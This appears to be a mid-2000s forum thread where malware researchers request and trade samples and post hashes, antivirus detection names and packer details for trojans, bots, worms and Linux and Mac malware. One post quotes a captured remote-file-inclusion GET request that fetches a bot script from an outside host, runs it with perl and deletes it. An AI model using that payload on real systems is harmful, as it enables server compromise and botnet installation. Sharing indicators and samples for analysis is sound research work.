Malware

Cryzip Wanted

Does anyone have a copy of the new Cryzip trojan that purportedly encrypts files then demands a $300 ransom for decryption? Thanks.

Trojan.Win32.Morwill.B

MD5: 1d098fb29bf0c99fd786e5e6c749f9eb

AntiVir 6.34.0.53 03.07.2006 TR/Click.Morwill.B.3
Avast 4.6.695.0 03.06.2006 no virus found
AVG 718 03.07.2006 Adware Generic.AFJ
Avira 6.33.1.53 03.07.2006 TR/Click.Morwill.B.3
BitDefender 7.2 03.07.2006 Trojan.Clicker.Morwill.B
CAT-QuickHeal 8.00 03.07.2006 no virus found
ClamAV devel-20060126 03.07.2006 no virus found
DrWeb 4.33 03.07.2006 no virus found
eTrust-InoculateIT 23.71.95 03.07.2006 no virus found
eTrust-Vet 12.4.2108 03.07.2006 no virus found
Ewido 3.5 03.07.2006 Hijacker.Morwill.b
Fortinet 2.71.0.0 03.07.2006 Adware/Morwill

sdbots from soinull

Thanks to soinull for the big contribution.
Password is infected

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 6fc1e9e7942ba69aa7d4e252919a108e
SHA1SUM: 48e3941bdeff80273e474a2a6f0d033d73b4adf5
SHA256SUM: f000dde6db5d6188ba422b51c7908c9fc5fdad74cb1f3a6a24d75711e04595ae
A/V SCAN: Found Win32/Rbot
PACKER: PE_PATCH.PECOMPACT, PECBUNDLE, PECOMPACT
#################################

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 3780075cda61d6fc9487e412dc20d6bf
SHA1SUM: d0c5757874c24c22a272815c0e25e9d20434316f

Worm.Rays.A

Thanks to Scarlet Pimpernell for the sample.

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 2a53b32f891e1ec1bf71a3f3746d4bbb
SHA1SUM: 846e2bcdc0a2e2911056b57948f533d1096a003f
SHA256SUM: e7f0f9351093d504f7a65f1980f4312e79e256275d02037d4106e10394e13fcb
A/V SCAN: Worm.Rays.A
#################################

Trojan.Win32.Agent.Q

EDITED by Tebodell

2C2EE583.DLL
MD5SUM: 476d8b31bfd01f2d264f2133c47a3d37
SHA1SUM: ba5ff9dfbd0702e85799ed46dd3197691b4eb149
SHA256SUM: 1dc6daa68dc554d95db5d9506f7ccb4eb85750c93f90f3b1762d74a096257ae0

PACKER: UPX
REF: Submitted by MythX
DATE FOUND: 2/20/2006
VECTOR: Email
THREAT: Backdoor
CME #: N/A

Shellbot reloaded

Found this probing the networks just now... more soon.

UPDATE: Mmm Google hunting..

GET phpfile.php?action=logout&siteurl=http://www.carteirovirtual.org/cmd.txt?&cmd=cd%20/tmp;\
GET%20http://www.athgroup.org/bot3.txt;perl%20bot3.txt;rm%20-rf%20bot3.txt? HTTP/1.0

PackBot

Found one PackBot.p

md5sum : 4880165cef39e60fa85fe32b801bc33e
infected: Backdoor.Win32.PackBot.p

lys.

Looking for a malware md5 list

I'm currently involved in doing some forensic analysis with Helix, and I was hoping someone in the forum could point me in the direction of a good md5 list for common malware (sdbot/gaobot/mytob variants, general worms, virii, etc.) Any help would be appreciated.

Austere
divinespiral-at-gmail.com

New Linux Malware

Two Linux malware in zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e

lys.

Searching : OSX.Leap.A

Hi,

I'm looking for OSX.Leap.A malware "latestpics.tgz"

https://www-secure.symantec.com/avcenter/venc/data/osx.leap.a.html

Does someone have this one?

tia,

lys
